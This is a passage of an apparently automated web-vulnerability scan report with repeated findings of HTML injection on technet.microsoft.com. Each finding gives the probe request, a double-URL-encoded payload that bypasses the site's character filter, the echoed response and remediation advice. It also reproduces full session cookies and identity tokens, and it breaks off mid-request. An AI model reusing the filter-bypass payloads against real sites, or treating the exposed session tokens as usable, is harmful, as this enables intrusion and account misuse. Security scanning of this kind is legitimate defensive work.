Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:19:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727063.aspxf5c6e"><a>5d24c93418e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37706%2522%253e%253ca%253ec498c29b365 was submitted in the REST URL parameter 1. This input was echoed as 37706"><a>c498c29b365 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us37706%2522%253e%253ca%253ec498c29b365/library/bb727064.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:18:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us37706"><a>c498c29b365/library/bb727064" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bb58%2522%253e%253ca%253e6f7eb8184e8 was submitted in the REST URL parameter 2. This input was echoed as 6bb58"><a>6f7eb8184e8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library6bb58%2522%253e%253ca%253e6f7eb8184e8/bb727064.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10201
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:19:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6bb58"><a>6f7eb8184e8/bb727064" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ab2b%2522%253e%253ca%253efc6fb84a5cb was submitted in the REST URL parameter 3. This input was echoed as 4ab2b"><a>fc6fb84a5cb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727064.aspx4ab2b%2522%253e%253ca%253efc6fb84a5cb HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:20:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727064.aspx4ab2b"><a>fc6fb84a5cb" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1793f%2522%253e%253ca%253eb68b233da00 was submitted in the REST URL parameter 1. This input was echoed as 1793f"><a>b68b233da00 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us1793f%2522%253e%253ca%253eb68b233da00/library/bb727067.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:22:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us1793f"><a>b68b233da00/library/bb727067" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a157%2522%253e%253ca%253e468fcae21f5 was submitted in the REST URL parameter 2. This input was echoed as 9a157"><a>468fcae21f5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library9a157%2522%253e%253ca%253e468fcae21f5/bb727067.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:23:08 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library9a157"><a>468fcae21f5/bb727067" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87d4%2522%253e%253ca%253ec2cdf0cd2d was submitted in the REST URL parameter 3. This input was echoed as a87d4"><a>c2cdf0cd2d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727067.aspxa87d4%2522%253e%253ca%253ec2cdf0cd2d HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 